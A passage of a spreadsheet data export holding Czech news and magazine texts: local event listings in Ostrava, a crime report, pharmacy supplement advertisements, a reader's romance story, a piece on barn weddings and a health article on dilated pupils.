budoucím provozovatelem restaurace Autor: BARBORA MAŠÁT JANÁKOVÁ redaktorka Autor Bára Janáková</t>
  </si>
  <si>
    <t>20241101_673_3239786350_88e885d95076625a081f.html</t>
  </si>
  <si>
    <t>88e885d95076625a081f</t>
  </si>
  <si>
    <t>v centru ostravy to žije!!!</t>
  </si>
  <si>
    <t>v centru ostravy to žije!!! Moravská Ostrava a Přívoz patří mezi nejlidnatější území Ostravy a v současnosti se počet zdejších obyvatel dále zvyšuje. Radnice centrálního obvodu se tak spolu s Centrem kultury a vzdělávání Moravská Ostrava (CKV) snaží svým občanům i návštěvníkům neustále poskytovat pestrou nabídku kulturních akcí a rozšiřovat také pole své působnosti o další aktivity pro děti i dospělé. Centrum města tepe životem i kulturou. SlavnoSt Svatého Martina Svatý Martin je opředen mnoha legendami a s jeho svátkem se pojí různé pranostiky a zvyky. Nejoblíbenější jsou zejména husí hody spojené s mladým vínem . Ty připravuje CKV na 9. listopad ve Vile Hanse Ulricha . Akce představí dobový jarmark se svatomartinskými pochutinami, řemeslnými výrobky a atrakcemi. Vrcholem večera bude průvod v čele s Martinem na bílém koni a jeho gardou, který povede od 17.00 hodin z Masarykova náměstí. andělé ve dvoraně K oblíbenému předvánočnímu programu patří již tradičně Andělé ve Dvoraně. Letošní třetí ročník se koná 7. prosince od 15.30 vprostorách radnice ivenku před ní. Bohatý program nabídne vánoční workshopy, kde bude možné vyrobit drobné vánoční dárky, i hudební vystoupení kapel Everyday Friday aThe Lewis Creaven Band. Těšit se můžete také na vernisáž výstavy Mozaika velkoměstské Ostravy 1925–2025, jejíž autorem je ilustrátor Marek Kulhavý. „Na Andělích mě těší především zapojení charitativních a neziskových organizací. Každý rok jsem dojatý při tanečním vystoupení Bílé holubice a obdivuji elán bubeníků ze Čtyřlístku,“ zve starosta MOaP Petr Veselka. den MoaP Celodenní akce Den MOaP probíhá tradičně na začátku června na Masarykově náměstí. Pro návštěvníky je připraven bohatý doprovodný program, rozmanitá gastrozóna místních podniků, relax zóna, atrakce pro děti a spousta workshopů. Kromě hudebního a zábavního programu je posláním akce prezentovat především veřejnosti lokální dobrovolnické spolky, školky a školy a další instituce v celé pestrosti jejích činnosti. Jedná se např. o sportovní či kulturní spolky, turistické oddíly apod. www.moap.ostrava.cz</t>
  </si>
  <si>
    <t>40420</t>
  </si>
  <si>
    <t>20241101_674_3239786352_131c05e66823e69cca15.html</t>
  </si>
  <si>
    <t>131c05e66823e69cca15</t>
  </si>
  <si>
    <t>Vražda na ubytovně. Podezřelá žena je ve vazbě</t>
  </si>
  <si>
    <t>Vražda na ubytovně. Podezřelá žena je ve vazbě NOVÉ MĚSTO NA MORAVĚ V neděli na ubytovně v Novém Městě na Moravě ubodala padesátiletá žena svého o rok mladšího partnera. Motivem byly partnerské neshody. Žena se policistům přiznala, soud ji okamžitě poslal do vazby. V případě prokázání viny jí hrozí trest až osmnácti let vězení. Do ubytovny nejprve vyjížděla posádka zdravotnické záchranné služby. Na místě již nalezla muže bez známek života. Přivolala proto policisty. „Prvotním ohledáním těla jsme zjistili, že muž zřejmě zemřel cizím zaviněním,“ uvedla policejní mluvčí Dana Čírtková. Devětačtyřicetiletý muž na ubytovně bydlel. Na těle měl bodnořezná poranění. Že zemřel jejich následkem, potvrdila soudní pitva. Podezřelá a podnapilá „Na místě jsme zadrželi osobu důvodně podezřelou ze spáchání násilného trestného činu. Jednalo se o padesátiletou přítelkyni mrtvého muže,“ prozradil vedoucí krajské kriminálky Pavel Kubiš. V době zadržení byla v podnapilém stavu. Při prohlídce místa činu kriminalisté našli i pravděpodobnou vražednou zbraň. Byl jím nůž. V pondělí vyšetřovatel zahájil trestní stíhání ženy. Státní zástupce poté podal návrh na vazební stíhání. Okresní soud ve Žďáře nad Sázavou mu vyhověl a ženu poslal do vazby. Přímo ze soudní síně ji policisté eskortovali do věznice v Brně . Podle místních se vražda stala na ubytovně poblíž tamního kovošrotu, který se nachází nad železničními kolejemi v Soškově ulici. „Nijak mě to nepřekvapilo, protože se tam, bohužel, po okolí stahují samí pochybní lidé, už od pohledu pod vlivem alkoholu , drog a podobně,“ popsala obyvatelka Nového Města na Moravě , která si nepřála být jmenována. (vok, ned)</t>
  </si>
  <si>
    <t>20241101_675_3239779657_22fe58574167cd4d6168.html</t>
  </si>
  <si>
    <t>22fe58574167cd4d6168</t>
  </si>
  <si>
    <t>NEPODCEŇTE PŘÍPRAVU na podzim</t>
  </si>
  <si>
    <t>NEPODCEŇTE PŘÍPRAVU na podzim STIMULACE IMUNITY JIŽ PO 5 MINUTÁCH! Potřebujete v tomto chladném počasí nutně posílit Vsvou oslabenou imunitu? yzkoušejte doplněk stravy z lékárny Imunit® 5PreveMax obsahující nukleotidy získané ze sladkovodní řasy chlorelly a betaglukany z hlívy ústřičné. Jeho složení je navíc obohaceno o vitamin C a selen pro přirozenou funkci imunitního systému. Kyselina listová pak pomáhá snižovat míru únavy a vyčerpání. Výborné cucavé tablety s jahodovou příchutí působí díky své nové formě přímo na sliznici v dutině ústní. Tím zajišťují rychlé působení přítomných látek již po 5 minutách od užití! ZKROŤTE ZLOBIVÝ ZUB Dentacol z lékárny rychle zklidní zlobivý zub či citlivou dáseň a zajistí vám dlouhodobou úlevu. Ulevte si rychle od problémů se zlobivým zubem, s citlivými dásněmi nebo odhalenými Skrčky. polehněte se na účinný přípravek Dentacol, který rychle uleví od nepříjemných pocitů v dutině ústní. Díky přírodnímu složení s obsahem hřebíčku a skořice Dentacol rychle zklidní problematické místo a pozitivně působí na mikroflóru ústní dutiny bez jakýchkoli vedlejších účinků. Obsažený alkohol navíc hubí nežádoucí mikroorganizmy v ústech. KONEC SMUTKU, STRACHŮM A STAROSTEM Už žádné trápení, starosti ani vnitřní neklid! Nastal čas přemoci psychickou nepohodu i občasné poruchy nálady, naladit se do pozitivna a opět se naplno radovat ze života! Poznejte recept, jak povznést svou náladu do plusu s jedinečným Vpřípravkem z lékárny. yzkoušejte tradicí ověřený, originální přípravek Therapill® L-Tryptofan. Tento unikátní doplněk stravy obsahuje čistý a kvalitní L-tryptofan, jenž je přirozeným zdrojem hormonu štěstí (serotoninu), a vitamin B6, který přispívá ke snížení míry únavy a vyčerpání. Therapill L-Tryptofan vám proto pomůže navrátit duševní klid a ztracenou pohodu. Při jeho užívání se zároveň nebudete muset obávat nežádoucích účinků, jako je omezení bdělosti či návykovost. Therapill L-Tryptofan, váš recept na dobrou náladu! SRAZILY VÁS KLOUBY NA KOLENA? POSTAVTE SE NA NOHY KONOPÍM! Ztuhlost, opotřebení a celková funkčnost kloubů trápí velkou část starší populace, zdaleka však nejen ji! Stav kloubů určuje nejen věk a dlouhodobé přetěžování fyzickou námahou či nadváhou, ale také nedostatek pohybu nebo nevyvážená Pstrava. řípravek CannamediQ Ortopeden® obsahuje vysoké množství glukosaminu v denní dávce, konopí a kurkumu pro špičkovou kondici a dokonalou hybnost kloubů, dobrý stav kostí i celého pohybového aparátu. Vitamin C v tomto doplňku stravy navíc podpoří tvorbu kolagenu v kloubních chrupavkách a obsažený resveratrol postaví na nohy dokonce i starší generaci vzdávající se naděje na aktivní život. AKTIVNÍ KO N O P Í Přípravky CannamediQ využívající aktivní konopí najdete ve své lékárně. NEDAJÍ VÁM NEKLIDNÉ NOHY SPÁT? Znáte ten pocit, když si chcete po celém dni odpočinout, avšak nutkavá potřeba měnit polohu nohou vás nenechá v klidu a třeba ani spát? Nejste v tom sami… Syndromem neklidných nohou trpí každý 10. Čech. U Naštěstí je zde revoluční řešení! klidněte své neklidné nohy bylinným sprejem SYNNEXIL. Synnexil je zdravotnický prostředek, který lokálně omezuje příznaky syndromu neklidných nohou, čímž napomáhá také klidnému usínání a nerušenému spánku. Žádejte ve svých lékárnách. Syndrom neklidných nohou vyřešen Kvalitní spánek zajištěn Čtěte pečlivě návod k použití a informace, které se vztahují k bezpečnému používání zdravotnického prostředku. OPAR? VYŘEŠENÝ! Řešíte nekonečné problémy s opary, jejich nepříjemným svěděním, pálením a nevábným vzhledem? Zatočte Zs nimi konopím! a nevzhledné opary na rtech může vysoce infekční virus herpes simplex, který se obvykle projeví při oslabení imunity při nachlazení nebo kvůli stresu. Cannadent regenerační sérum s konopným olejem, jedlí sibiřskou, hřebíčkem, arnikou a Tea tree urychluje regeneraci postižené tkáně, omezuje její mokvání a svědění, pálení a pnutí. Účinně také omezuje šíření viru a tím i výskyt dalšího oparu. Kompletní portfolio konopné péče Cannaderm je k dostání v lékárnách, zdravých výživách a na www.cannaderm.cz.</t>
  </si>
  <si>
    <t>146000</t>
  </si>
  <si>
    <t>20241101_676_3239779266_7f76397b59f1e73b57e9.html</t>
  </si>
  <si>
    <t>7f76397b59f1e73b57e9</t>
  </si>
  <si>
    <t>JAK JSTE SE S MAMINKOU seznámili?</t>
  </si>
  <si>
    <t>JAK JSTE SE S MAMINKOU seznámili? Jen málo lidem jsme řekli o tom, kde jsme se s mužem poznali. Jde o historii zvláštní, bolestnou, ale i hřejivou. Jednou se na to zeptaly i naše děti. Marcela, 37 let neštěstí jí přineslo lásku Když mi bylo pouhých osmnáct, zemřela mi tragicky maminka. Vracela se zrovna ze služební cesty, na kterých v době mého dětství a dospívání trávila hodně času. Byla zahraniční reportérkou a svou prací žila. Přestože jsem své zklamání nad tím, že nebyla u většiny mých důležitých životních milníků přítomná, nedávala najevo, pravda byla taková, že mě její nepřítomnost hodně bolela. „Podařilo se mi dostat volno, takže na tvém maturiťáku budu,“ telefonovala mi tehdy celá nadšená z Francie . Věděla jsem, jak těžké pro ni muselo být volno si zařídit, a cítila jsem snad dokonce hanbu, že ji stahuju ze zajímavého projektu. „Mami, to vážně nemusíš,“ řekla jsem jí tehdy do telefonu a v duchu přitom doufala, že máma volno nakonec neodřekne. „Broučku, to si nemůžu nechat ujít. Musím vidět, jak budeš krásná,“ opáčila máma a mně poskočilo srdce radostí. Při cestě z letiště měla máma nehodu. Na dálnici někdo naboural do jejího taxíku. Maminka byla na místě mrtvá. Další měsíce po její smrti mám v mlžném oparu. Chodila jsem do školy, starala se o tátu, kterého mámina smrt naprosto zlomila, ale vlastně jsem byla jen chodící mrtvolou. Navíc jsem samu sebe vinila, že kdyby nebylo mého plesu, máma by ještě žila. Zároveň jsem měla pocit, že jsem jí toho hrozně moc neřekla. Když jsem za ní šla asi měsíc po její smrti na hřbitov, napsala jsem jí svůj první dopis. Na kousek papíru jsem napsala, jak moc mi chybí. Psala jsem, jak se mi po ní stýská a jak se starám o tátu a snažím se ho držet dál od alkoholu . Dopis jsem položila na její hrob. Část mě si říkala, že je to šílené, ale zpětně vidím, že to byl způsob, jak se s její smrtí alespoň trochu vyrovnat. Pokaždé když jsem znovu přišla na hřbitov, dopis jsem tam našla promoklý, nebo naopak vybělený sluncem. Hned jsem potom psala další. Stal se z toho můj malý rituál, o kterém jsem nikomu neřekla, ale který mi pomáhal přežít. Byla jsem naprosto v šoku, když jsem jednou na dopise našla připsaný cizí vzkaz. Šlo zrovna o srdceryvný dopis, kde jsem popisovala, jak moc si máminu smrt kladu za vinu. Psala jsem, že větší utrpení snad neexistuje. Pod mými řádky bylo kostrbatým písmem připsáno: Myslím, že si umím představit, jak se cítíš. Za vinu si její smrt ale dávat nesmíš. Stalo se mi něco podobného. Ta bolest časem otupí, nepřejde ale nikdy. Vyplašeně jsem na ten vzkaz zírala. Netušila jsem, kdo a proč mohl něco takového napsat. Pamatuju si, že se ve mně vzedmula vlna vzteku. Jak si vůbec dotyčný mohl dovolit brát dopis do rukou, číst cizí psaní a ještě na něj sám psát, že si umí představit, jak se cítím? Vztekle jsem se rozhlédla kolem, ale nikde jsem nikoho neviděla. Po chvíli váhání jsem vzala připravenou tužku a napsala svůj vzkaz. Laskavě mě nech na pokoji. O tom, jak se cítím, nevíš vůbec nic. Dopis jsem položila na hrob a po chvíli rozhlížení jsem odklopýtala pryč. Naše dopisování s neznámým začalo být pravidelné. Od roztrpčených vzkazů až po filozofické debaty. Pokaždé když jsem šla na hřbitov, srdce mi bušilo vzrušením, co tam od neznámého najdu. Toho dne jsem se probudila hodně brzy ráno a už jsem nemohla zabrat. Venku bylo krásně a já jsem v posteli nedokázala vydržet. Rychle jsem se oblékla a vydala se na hřbitov. Minule jsem tam neznámému nechala vzkaz, kde jsem se ho otevřeně ptala, co se jemu stalo tak hrozného, že se dokáže porovnávat s mým utrpením. Bylo to asi příliš troufalé, ale já se nemohla dočkat, jakou najdu odpověď. Možná je divné říct, že jsem si za dobu našeho psaní vytvořila k neznámému jakýsi podivný vztah, ale byla to pravda. Netušila jsem, co na hřbitově pohledává nebo jak je starý. Měli jsme mezi sebou ale rozhodně podivné spojení. Byl to někdo, kdo mojí ztrátě, na rozdíl od mých kamarádů a spolužáků, rozuměl. Kráčela jsem k mámině hrobu prosluněným ránem, když vtom jsem přímo před sebou zahlédla postavu. Tak brzy na hřbitově ještě nikdo nebyl a já jsem pojala neodbytné tušení, že jde o „mého“ neznámého. Schovala jsem se za náhrobek a sledovala, jak se kluk v mikině s kapucí blíží k mámině hrobu. Jakmile se sehnul a vzal do ruky bílý dopis na hrobě, vyplížila jsem se ze svého úkrytu. „Taky vstáváš hodně brzo,“ prohodila jsem jakoby nic, přestože mi srdce bilo na poplach. Kluk mohl být jen o pár let starší než já. V očích se mu zračil strach s překvapením a obavami. Chvíli na mě zůstal jen zírat. „Já jsem Karel,“ napřáhl ke mně ruku, což byla ta nejjednodušší věc, co mohl v ten moment udělat. Překvapeně jsem na něj koukala a až po chvíli jsem mu váhavě stiskla ruku. „Marcela,“ zašeptala jsem a po chvíli mlčení ho vyzvala, aby mi řekl, co jemu se v životě přihodilo. „Můj příběh už znáš, tak mi pověz, co se stalo tobě.“ „Umřel mi bratr,“ hlesl nakonec a přitom mu přeskočil hlas. „Když mi bylo devět let, rodiče nás nechali samotné doma. Měl jsem na mladšího bráchu dávat pozor, jenomže jsem si na chvíli odskočil a on se zatím utopil ve vaně. Hádám, že o vině něco vím…“ K mému úžasu se otočil a pomalu ode mě odcházel. Zdálo se mi to, nebo se mu lehce zatřásla ramena? „Počkej! Neodcházej!“ zakřičela jsem za ním, ale Karel na mé volání nedbal. Loudal se pryč a já jsem se cítila, jako kdyby uvnitř mě někdo rozbil tisíce střepů. Konečně jsem ho doběhla. Pohlédla jsem do jeho bledé tváře a v jeho očích viděla stopy po slzách. „To mě opravdu moc mrzí. Nechtěla jsem v tom dopise snižovat tvoje utrpení. Po psaní s tebou mi vždycky bylo líp. Prosím, nepřestávejme,“ zašeptala jsem a z náhlého popudu chlapce objala. Jeho tělo se mi poddalo. Stáli jsme v objetí na hřbitově a v mlčení nám bylo oběma dobře. Teprve když jsme se po dlouhé době z náručí vymanili, všimla jsem si, že stojíme u malého hrobečku s fotkou asi pětiletého chlapečka. Podoba s Karlovými rysy se nedala popřít. „Nesmíš si to vyčítat. Byl jsi příliš malý a rodiče vás určitě neměli nechávat doma samotné,“ zašeptala jsem při pohledu na fotku malého Toníka. „Možná bychom si místo psaní na hřbitově mohli vyměnit e-maily,“ navrhla jsem po dlouhé době ticha, kdy jsme se oba dívali na malý hrobeček a utírali slzy, které se nám oběma koulely po tvářích. No a od té doby jsme spolu s Karlem byli v kontaktu. Nejdřív jsme se jen oťukávali a pokračovali ve vylévání našich srdcí přes e-mail. Trvalo několik měsíců, než mě Karel poprvé pozval ven. „Je to, myslíš, rande?“ ptala jsem se rozechvěle kamarádky Lenky, která s úsměvem přikývla. Bylo to zvláštní, ale zároveň hrozně přirozené. Poprvé jsme si spolu venku nepovídali jen o smutných věcech, ale soustředili se i na nás a naše současné životy. Na konci večera mi Karel dal první pusu. Když mě po třech letech chození nakonec požádal o ruku a na prsteníček nasadil zásnubní prstýnek, nemohla jsem být šťastnější. Do půl roku jsme se vzali. Čas běžel a brzy po svatbě přišly děti. Když se Daník s Eliškou jednou zeptali na naše seznámení, Karel se jen tajemně usmíval. „Seznámili jsme se s maminkou na hodně divném místě. Řekneme vám o tom, až budete trochu větší,“ řekl jim. „Vždycky tady pro ně budu a nikdy je nenechám samotné,“ slíbila jsem toho večera Karlovi, když jsme děti uložili a nalili si na terase víno . „A já zas nikdy nedopustím, aby se někdy museli trápit kvůli tomu, co nebyla jejich chyba,“ dodal Karel. „I když podobné životní karamboly nakonec můžou vést i k dobrým věcem,“ usmál se a něžně mě políbil. Poprvé jsme si spolu nepovídali jen o smutných věcech. A ten večer mi Karel taky dal první pusu. V příběhu byla změněna jména. Ilustrační foto: Shutterstock</t>
  </si>
  <si>
    <t>20241101_677_3239777398_897f913bc0f80cc7b041.html</t>
  </si>
  <si>
    <t>897f913bc0f80cc7b041</t>
  </si>
  <si>
    <t>Svatba na zámku? Kdeže. Teď jsou v módě hory i stodoly</t>
  </si>
  <si>
    <t>Svatba na zámku? Kdeže. Teď jsou v módě hory i stodoly Zatímco v zahraničí jsou v oblibě luxusní prostory, v Česku nyní frčí statky či stodoly. Proto se jich třeba v Plzeňském kraji v posledních letech vyrojily desítky. Statek Háječek Hlohovice, selský dvůr U Matoušů Plzeň, statek Darmyšl, statek Slatina v Hostouni , Angusfarm Soběsuky, Chodská chalupa Újezd u Domažlic , Svatební stodola Borovy u Přeštic , zbirožský Dvůr, Stodola Pod Lípou, Statek Slatina, Statek Keseg, Svatební stodola Týniště, Fara Brixi, 100dola Klatovy , Statek Česká lípa , Stodola mezi smrky, Peckův mlýn, Stodola ve dvoře, Statek Pňovany. To je jen zlomek statků a chalup v Plzeňském kraji , kde se dají pořádat svatby. Zatímco dříve snoubenci milovali třeba zámky, jak říká svatební koordinátorka Lucie Košinářová, dnes frčí svatby ve stodole či na statku. Obřad se pak koná třeba u potoka, u rybníku nebo u kapličky v lese. Jsou ale i svatby na nejvyšším vrcholu Bavorského lesa, na vrcholu Javor. „Letos odbavím asi 31 svateb, většina z nich jsou statky a stodoly. Dříve to byly spíš zámky, které dnes už tolik netáhnou,“ uvádí Košinářová. Dva, tři roky zpátky se podle ní jednalo vyloženě o stodoly, ty ale mezitím dostaly novou tvář, takže teď už jsou to celkem nadčasové statky, které nabízejí moderní prostředí. V posledních letech podle Košinářové vzniklo velké množství nových statků, kde se svatby mohou konat. „Všichni si totiž myslí, že provozovat svatební místo je strašně jednoduché a že výdělek je velký, takže teď se statků a stodol vyrojilo opravdu hodně,“ říká koordinátorka. V Plzeňském kraji jsou tedy místa, která už jsou za dobu tří, čtyř let zajetá, ale objevují se i nově otvíraná místa nebo statky a stodoly, které mají rezervace až na příští rok. A proč mají tyto prostory, kde to funguje tak, že člověk v pátek dostane klíče a v neděli je odevzdá, takovou oblibu? „Lidé si myslí, že ušetří, ale ve finále neušetří, když se pronájem pohybuje od 65 do 100 tisíc i víc,“ uvádí Košinářová. Dříve se podle ní svatební hosté obraceli spíš na hospody či sokolovny, kde se sice neplatí nájem, ale platí se jejich pití a jídlo včetně marží, které nejsou třeba u alkoholu úplně nízké. „Takže dnes se na tři dny pronajme například stodola a prosecco, víno a další alkohol se koupí z vlastních peněz v akci. Lidé tedy rok, dva předem sledují akce a psychologicky si myslí, že ušetří, ale při průměrné svatbě o 60 hostech se pod 250 tisíc korun stejně nedostanou. Dnes jsem měla schůzku s nevěstou: nájem stodoly je 45 tisíc, ale s ostatními položkami se dostaneme na 250 tisíc, přitom v této částce není nic extra, ale náklady nejsou ani příliš osekané,“ líčí Košinářová. Vše probíhá tak, že v pátek se přijede, pracuje se na dekoracích, v sobotu je svatba a v neděli úklid a odjezd. Statky a stodoly jsou podle Košinářové v oblibě hlavně v Česku. „V zahraničí frčí spíš vily a luxusnější místa, v Česku zase statky či stodoly, protože lidem to připadá domácké, připadají si tam jako u babičky na chatě,“ odhaduje Košinářová. Ne v každé stodole je ale uspořádání svatby jednoduché. „Zažila jsem stodolu, kde nebyla ani voda. Když jsem ji viděla, polila mě tehdy hrůza,“ popsala. Výsledkem byla náročnější organizace svatby včetně toho, že se musela na místo dovézt voda. „Většinou jsou s tím místem snoubenci nějak spjatí nebo jim připadá zajímavý nájem v hodnotě třeba 20 tisíc. Ale ten se rychle zvýší o vícenáklady, které nejsou na počátku patrné,“ poznamenává Košinářová. Sto kilometrů od Plzně na nejvyšším vrcholu Bavorského lesa, na Javoru ve výšce 1456 metrů nad mořem, jsou svatby také oblíbené, a to i se vším komfortem. Na Javoru má totiž pobočku matriční úřad Bavorské Rudy a zdejší svatební obřady jsou hitem posledních let. Výhled na Ostrý, Luzný, Roklan či Velký Falkenstein mají totiž svatebčané při obřadu v budově na vrcholu Velkého Javoru s okny až ke stropu přímo před očima. Do bavorského pohraničí zamíří ročně více než 40 párů. České páry jsou zde vítány, i když na ně čeká notná dávka byrokracie. NÁVRAT K TRADICÍM, ALE I VENKOVSKÉ PROSTŘEDÍ. I TAKOVÉ JSOU TRENDY. SVATEBNÍ LANOVKA? I TAKOVÝ ZÁŽITEK NABÍZEJÍ PÁRŮM NA JAVORU. Autor: TEXT: JITKA KUBÍKOVÁ ŠRÁMKOVÁ Autor Jitka Kubíková Šrámková</t>
  </si>
  <si>
    <t>22740</t>
  </si>
  <si>
    <t>20241101_678_3242016548_39d6fed6013453cd33a8.html</t>
  </si>
  <si>
    <t>39d6fed6013453cd33a8</t>
  </si>
  <si>
    <t>Rozšíření zornic je projevem poranění či požití drog. V&amp;nbsp;rámci očního vyšetření bývá vyvoláno záměrně</t>
  </si>
  <si>
    <t>Rozšíření zornic je projevem poranění či požití drog. V&amp;nbsp;rámci očního vyšetření bývá vyvoláno záměrně Zdraví.euro.cz Domácí lékař Rozšíření zornic je projevem poranění či požití drog. V rámci očního vyšetření bývá vyvoláno záměrně Rozšíření zornic je projevem poranění či požití drog. V rámci očního vyšetření bývá vyvoláno záměrně Sdílet Autor: Depositphotos.com/mikeledray K rozšíření zornic běžně dochází při snížené viditelnosti, aby do oka mohlo vniknout více světla. Pozornost tomuto stavu je třeba věnovat, pakliže přetrvává po delší dobu. Odborně se označuje jako mydriáza a způsobují ji jisté léky, poranění, ale i vyšší hladina oxytocinu v těle. Mimo jiné se po čas hojení doporučuje nosit brýle s fotochromatickými či polarizačními skly. Co znamenají rozšířené zornice? Co znamenají rozšířené zornice? Příčiny rozšířených zornic Doprovodné projevy rozšířených zornic Diagnostika Léčba Rozšířené zornice v oku se odborně nazývají mydriáza a mohou zasáhnout jedno, ale i obě oči. Vyznačují se tím, že černý střed očí je větší než obvykle. Naopak miózou se označuje zúžení zornic. Obvykle se u dospělého jedince velikost zornic pohybuje mezi 2 a 8 mm v závislosti na světelných podmínkách, přičemž se běžně mění z důvodu regulace světla vpuštěného do oka. V duhovce se vyskytují drobné svaly, které jsou za změnu velikosti zornice zodpovědné, konkrétně jde o musculus dilator pupillae. Na velikost zornic má vliv i parasympatikus a sympatikus, přičemž rozšiřování zornic se týká sympatiku. Typicky se zornice zmenšují při jasném světle, zvětšují naopak za tmy. Tím korigují, kolik světla se do oka dostane. Ke zmenšení zornic dochází do jisté míry vlivem stárnutí, nebo když se člověk soustředí na blízký předmět. Na druhou stranu rozšíření zornic nastává, pokud se dotyčný cítí v ohrožení (zaostření z důvodu lepší viditelnosti) nebo jeho pohled spočine na něčem, co se mu líbí. Za zajímavý fakt pokládáme, že dle studií jsou ženy s většími zornicemi pro muže atraktivnější. Nicméně pokud zornice zůstávají rozšířené, ačkoli k tomu není zjevný důvod, může se jednat o projev vážnějšího zdravotního problému. [ 1, 2, 3, 4, 5, 6, 7 ] Příčiny rozšířených zornic Za rozšířením zornic může stát: oční vyšetření, léky ( antidepresiva, antihistaminika, léky proti záchvatům či nevolnosti, atropin, botulotoxin), poranění oka, mozku či jiné zdravotní potíže (Adieho syndrom, anizokorie či migréna ), drogy (kokain, extáze, LSD, metamfetamin, psychedelické houby), vyšší hladina oxytocinu v těle. Některé léky mají dopad na svaly ovládající velikost zorniček a mohou tak způsobit jejich rozšíření, jedná se o atropin (k léčbě žaludečních problémů, otrav a potíží se srdečním rytmem), antihistaminika (difenhydramin a dekongestiva), léky proti nevolnosti (dimenhydrinát) nebo náplast se skopolaminem, léky na Parkinsonovu chorobu (amantadin), léky proti záchvatům (fenobarbital či topiramat), antidepresiva (amitriptylin) a botulotoxin. V rámci očního vyšetření či před operací rozšiřují lékaři zorničky záměrně, a to látkami zvanými mydriatika, která jsou součástí očních kapek. Mydriatika obvykle působí 4 až 8 hodin a kromě citlivosti na jasné světlo je zpravidla nedoprovází nežádoucí účinky. Naproti tomu anticholinergika se objevují v různých lécích na předpis a jako vedlejší účinky se uvádí rozmazané vidění či závrať. Dále rozšířené zornice způsobují drogy a to tím, že zpomalují reakci svalů v duhovce na světlo. Alkohol či marihuana sice jejich přímou příčinou nejsou, ale údajně snižují schopnost adaptovat se na různé světelné podmínky v průměru na 2 hodiny po jejich požití. Rozšíření zornic prý nastává i po vdechnutí vůně či dotyku jistých rostlin, jako je durman obecný či durmanovec. Migréna pak někdy vyvolává benigní epizodickou jednostrannou mydriázu, kdy dochází k rozšíření pouze jedné zornice. Dalším příznakem spolu s bolestí hlavy přitom bývá rozmazané vidění. Zpravidla nejde o nic vážného a zornička se zas zmenší do několika hodin, někdy však tento stav trvá i pár dnů. Kromě toho je rozšíření zorniček projevem mikrovaskulární obrny lebečních nervů, tedy zamezení průtoku krve nervy. Na vině může být i úraz hlavy, mrtvice nebo nádor, kdy vzniklý tlak poškozuje svaly duhovky. Narušit funkci nervů či svalů v této oblasti může též poranění oka (údery pěstí nebo kontakt s chemickými látkami), to ale nastává i po operaci očí (např. při odstranění šedého zákalu či transplantaci rohovky). Někdy poranění oka vede ke změně vidění, nebo dokonce slepotě, a proto je nutné s vyhledáním lékařské pomoci neotálet. Způsobit mydriázu může i aniridie. Jedná se o vrozenou oční vadu, kdy se jedinec narodí buď jen s částečnou, nebo vůbec žádnou duhovkou, kvůli čemuž bývají dotyční velmi citliví na světlo. Pod pojmem Adieho syndrom se pak rozumí neurologická porucha, kdy je jedna zornice zvětšená oproti druhé. Projevuje se oslabenými šlachovými reflexy či jejich absencí. Rozšířené zorničky se též přičítají vyšší hladině oxytocinu v těle, což je hormon ovlivňující reprodukci, porod nebo hladinu testosteronu. K jeho zvýšení dochází i tehdy, pokud vás někdo přitahuje. Mimoto však může být rozšíření zornic v těhotenství známkou eklampsie. Tehdy je třeba problém řešit ihned. [ 8, 9, 10, 11, 12, 13, 14 ] 5 nemocí očí, které nám komplikují zrak Doprovodné projevy rozšířených zornic Rozšíření zornic může vyvolat citlivost na světlo, rozmazané vidění, podrážděnost očí a tlak v této oblasti či čele. V některých případech se dostavují závratě, bolest hlavy nebo potíže se spánkem. Pokud je na vině obrna, může se projevit i pokleslým očním víčkem či sníženou schopností s okem pohybovat. Jestliže za rozšířením zorniček stojí užívání drog nebo léků, vedlejšími projevy bývají i záchvaty, křeče, suchá kůže, horečka a zarudnutí. [ 15, 16, 17 ] Už jste někdy měli rozšířené zorničky? Ano, v rámci vyšetření oka Ano, kvůli poranění Ano, ale z jiného důvodu Ne Zobraz výsledek Diagnostika Pokud si všimnete, že máte zornice rozšířené bez zjevné příčiny, nebo se u vás projeví některý z doprovodných symptomů, je zapotřebí navštívit lékaře. Neodkladně se doporučuje vyhledat lékařskou pomoc tehdy, pokud došlo k rozšíření zornic následkem úrazu hlavy. Lékař obvykle provádí fyzikální vyšetření, přičemž si podrobně prohlédne oči a zjišťuje, jak oči reagují na světlo a tmu. Zároveň si všímá jakýchkoli abnormalit. Rovněž se dotyčného ptá, jestli užívá nějaké léky nebo drogy. Kvůli tomu může i trvat na krevních testech. V případě poranění hlavy a k odhalení jiných problémů se přistupuje ale i k zobrazovacím testům, tedy magnetické rezonanci a CT. [ 18, 19, 20 ] Léčba Rozšířené zorničky většinou nevyžadují zvláštní léčbu a samy se navrátí do původního stavu. To zvláště platí, pokud tento stav vyvolaly oční kapky. Dotyčný by se měl po ten čas pokusit stranit se světlu. Problém se jinak zpravidla řeší brýlemi s fotochromatickými či polarizačními skly, případně protetickými kontaktními čočkami. Tím se chrání oči, které jsou citlivé na světlo. Protetické kontaktní čočky navíc navozují zdání, že zornice mají obvyklou velikost. Především se doporučují, pokud člověk trpí aniridií či rozšíření zornic zapříčinil úraz hlavy. Při úrazu hlavy či oka se může také přistoupit k chirurgickému zákroku, aby se poškození nervů či očních struktur odstranilo. Je možné, že následně bude nutné mít oko nějakou dobu zalepené náplastí, aby se správně zhojilo. V případě, že k rozšíření zornic došlo v důsledku návykových látek, pomáhá rehabilitace pro závislé. Jestliže byly na vině léky, stačí je vysadit a počkat, než se oči opět zúží na běžnou velikost. Poté se radí tomuto léku vyvarovat. Naopak pozitivně by mohlo působit užívání pilokarpinu v malých dávkách. [ 21, 22, 23, 24 ] Zdroje: my.clevelandclinic.org, verywellhealth.com, healthline.com, medicalnewstoday.com, allaboutvision.com, webmd.com, aao.org, health.com, is.muni.cz, stefajir.cz, medvik.cz Autor: Dominika Nováková Autor person Dominika Nováková</t>
  </si>
  <si>
    <t>19150</t>
  </si>
  <si>
    <t>6820</t>
  </si>
  <si>
    <t>20241101_679_3244703732_9185843efbd3e0be3ce9.html</t>
  </si>
  <si>
    <t>9185843efbd3e0be3ce9</t>
  </si>
  <si>
    <t>Má se Google začít bát? ChatGPT spouští vlastní vyhledávač a má ambice ovládnout internet</t>
  </si>
  <si>
